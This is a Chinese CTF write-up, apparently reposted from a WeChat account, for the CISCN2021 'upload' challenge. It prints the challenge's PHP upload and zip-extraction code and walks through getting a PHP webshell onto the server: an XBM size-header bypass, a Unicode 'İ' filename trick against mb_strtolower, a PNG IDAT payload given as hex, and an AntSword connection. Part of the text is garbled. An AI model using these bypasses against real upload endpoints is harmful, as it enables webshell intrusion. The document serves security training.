[CISCN2021 Quals]upload-解题步骤详解

admin 2022年6月9日10:13:50CTF专场评论8 views4391字阅读14分38秒阅读模式

[CISCN2021 Quals]upload-解题步骤详解ciscn复现

学习自yu22x师傅博客

upload

这道题当天比赛,扫描后台发现了/example的页面,一共两篇源码,当时认为是利用example的源码,不适用index但是他题的意思是两个页面的源码都要利用起来,当天审计第一个页面的思路就是,先用ps创建一个图片大小为1*1的照片来过前两个检测,然后再修改照片里面的编码换成一句话木马,但是用于他有名字检测,所以没法继续进行。

学洗习了羽师傅的操作和想法,在buu上进行复现。

index.php


<?phpif (!isset($_GET["ctf"])) {    highlight_file(__FILE__);    die();}
if(isset($_GET["ctf"])) $ctf = $_GET["ctf"];
if($ctf=="upload") { if ($_FILES['postedFile']['size'] > 1024*512) { die("这么大个的东西你是想d我吗?"); } $imageinfo = getimagesize($_FILES['postedFile']['tmp_name']); if ($imageinfo === FALSE) { die("如果不能好好传图片的话就还是不要来打扰我了"); } if ($imageinfo[0] !== 1 && $imageinfo[1] !== 1) { die("东西不能方方正正的话就很讨厌"); } $fileName=urldecode($_FILES['postedFile']['name']); if(stristr($fileName,"c") || stristr($fileName,"i") || stristr($fileName,"h") || stristr($fileName,"ph")) { die("有些东西让你传上去的话那可不得了"); } $imagePath = "image/" . mb_strtolower($fileName); if(move_uploaded_file($_FILES["postedFile"]["tmp_name"], $imagePath)) { echo "upload success, image at $imagePath"; } else { die("传都没有传上去"); }}

我们由于还是属于初学者我就把一些知识点都进行整理,首先就是这个$_FILES这个经由 HTTP POST 文件上传而提交至脚本的变量。类似于旧数组 $HTTP_POST_FILES 数组。


$_FILES数组内容如下:<input type="file" name="userfile">$_FILES['userfile']['name']客户端机器文件的原名称。$_FILES['userfile']['type'] 文件的 MIME 类型,需要浏览器提供该信息的支持,例如“image/gif”。$_FILES['userfile']['size'] 已上传文件的大小,单位为字节。$_FILES['userfile']['tmp_name'] 文件被上传后在服务端储存的临时文件名。$_FILES['userfile']['error'] 和该文件上传相关的错误代码。['error'] 是在 PHP 4.2.0 版本中增加的。注: 在 PHP 4.1.0 版本以前该数组的名称为 $HTTP_POST_FILES,它并不像 $_FILES 一样是自动全局变量。PHP 3 不支持 $HTTP_POST_FILES 数组。

这样我们就知道了我们构造的上传网页,会转化为我们的数组,而第一个[]内就是我们上传文件的变量名字,第二个就是php规定的东西。

getmagesize()函数用于获取图像尺寸,类型等信息。

可以使用以下内容来绕过大小。

#define width 1#define height 1

如果我们用函数执行一个图片,并输出他生成的数组效果如下。

Array(    [0] => 350   图像宽度的像素值    [1] => 318   图像高度的像素值    [2] => 2     图像的类型,返回的是数字,其中1 = GIF,2 = JPG,3 = PNG,4 = SWF,5 = PSD,6 = BMP,7 = TIFF(intel byte order),8 = TIFF(motorola byte order),9 = JPC,10 = JP2,11 = JPX,12 = JB2,13 = SWC,14 = IFF,15 = WBMP,16 = XBM   宽度和高度的字符串    [3] => width="350" height="318"   宽和高的字符串    [bits] => 8  图像每种颜色的位数    [channels] => 3    [mime] => image/jpeg)

首先第一个是看是否上传的为照片,如果不是,报错,然后就是我们的图片像素宽高都应该是1。然后是把我们穿的文件的名字进行url解码,并进行stristr函数匹配。虽然函数本身不检测大小写,但是平常普通的绕过手段,.htaccess 的h被过滤,.use.ini 的i被过滤,而且就算我们抓包修改他的后缀,也会由于是后缀名字一起被检测。

我们扫描一下目录。/example

<?phpif (!isset($_GET["ctf"])) {    highlight_file(__FILE__);    die();}
if(isset($_GET["ctf"])) $ctf = $_GET["ctf"];
if($ctf=="poc") { $zip = new ZipArchive(); $name_for_zip = "example/" . $_POST["file"]; if(explode(".",$name_for_zip)[count(explode(".",$name_for_zip))-1]!=="zip") { die("要不咱们再看看?"); } if ($zip->open($name_for_zip) !== TRUE) { die ("都不能解压呢"); }
echo "可以解压,我想想存哪里"; $pos_for_zip = "/tmp/example/" . md5($_SERVER["REMOTE_ADDR"]); $zip->extractTo($pos_for_zip); $zip->close(); unlink($name_for_zip); $files = glob("$pos_for_zip/*"); foreach($files as $file){ if (is_dir($file)) { continue; } $first = imagecreatefrompng($file); $size = min(imagesx($first), imagesy($first)); $second = imagecrop($first, ['x' => 0, 'y' => 0, 'width' => $size, 'height' => $size]); if ($second !== FALSE) { $final_name = pathinfo($file)["basename"]; imagepng($second, 'example/'.$final_name); imagedestroy($second); } imagedestroy($first); unlink($file); }}

根据大麦的要求我们应该上传一个zip文件才可以利用,但是前面把i这个字母过滤掉了,我们只能思考mb_strtolower()函数可否利用。

$imagePath = "image/" . mb_strtolower($fileName);//可以利用一些unicode字符绕过。经过测试发现<?phpvar_dump(mb_strtolower('İ')==='i');?>结果为true并且前面还进行了url解密。所以可以用%c4%b0代替'İ'字符

为了绕过图片检测并实现木马的写入我们使用这个脚本。

https://github.com/huntergregal/PNG-IDAT-Payload-Generator/

首先要修改脚本中的payload。

[CISCN2021 Quals]upload-解题步骤详解

[CISCN2021 Quals]upload-解题步骤详解

https://gchq.github.io/CyberChef/

左侧是搜索功能,这个图片编码就按这么三项来就好。

右侧是代码中的原始payload。

将得到的数据进行修改

[CISCN2021 Quals]upload-解题步骤详解

复制出十六进制,到网站转换成payload,别忘了左侧的操作已变。

[CISCN2021 Quals]upload-解题步骤详解

a39f67641d201612546f112e29152b2167226b505050506f5f5310

修改脚本

[CISCN2021 Quals]upload-解题步骤详解


[CISCN2021 Quals]upload-解题步骤详解

修改图片后缀为php然后压缩成zip

上传文件并抓包,修改文件名并添加长度绕过的字符串。

[CISCN2021 Quals]upload-解题步骤详解

这里给一个post上传的网页源码。

<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>POST数据包POC</title></head><body><form action="http://faebbc7b-35b5-4792-8b8a-9af1ec7fc48f.node3.buuoj.cn/upload.php?ctf=upload" method="post" enctype="multipart/form-data"><!--链接是当前打开的题目链接-->    <label for="file">文件名:</label>    <input type="file" name="postedFile" id="postedFile"><br>    <input type="submit" name="submit" value="提交"></form></body></html>

[CISCN2021 Quals]upload-解题步骤详解

解压文件

[CISCN2021 Quals]upload-解题步骤详解

提示我们解压成功,询问我们在哪个目录下面。

imagepng( s e c o n d , ′ e x a m p l e / ′ . second, 'example/'. second, 

 example/ 

 .final_name);

这句话可以知道,他解压在了我们的example,目录下面,我们试着访问,/example/a.php成功,蚁剑,在etc找到奇怪目录,进行连接。

[CISCN2021 Quals]upload-解题步骤详解


[CISCN2021 Quals]upload-解题步骤详解


原文来自CSDN博主「jiangdie666」|侵删





[CISCN2021 Quals]upload-解题步骤详解

[CISCN2021 Quals]upload-解题步骤详解


中电运行是专业专注培养能源企业IT工匠和提供IT整体解决方案的服务商,也是能源互联网安全专家。

为方便大家沟通,中电运行开通“中电运行交流群”,诚挚欢迎能源企业和相关人士,以及对网络安全感兴趣的群体加入本群,真诚交流,互相学习[CISCN2021 Quals]upload-解题步骤详解[CISCN2021 Quals]upload-解题步骤详解。想加入我们就给我们留言吧[CISCN2021 Quals]upload-解题步骤详解

[CISCN2021 Quals]upload-解题步骤详解

[CISCN2021 Quals]upload-解题步骤详解

小白必读!寰宇卫士手把手教你栈溢出(上)

手把手教你栈溢出(中)

手把手教你栈溢出(下)

《信息安全知识》之法律关键常识汇总

CTF经验分享|带你入门带你飞!

[CISCN2021 Quals]upload-解题步骤详解

原文始发于微信公众号(寰宇卫士):[CISCN2021 Quals]upload-解题步骤详解

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月9日10:13:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  [CISCN2021 Quals]upload-解题步骤详解 http://cn-sec.com/archives/1099232.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: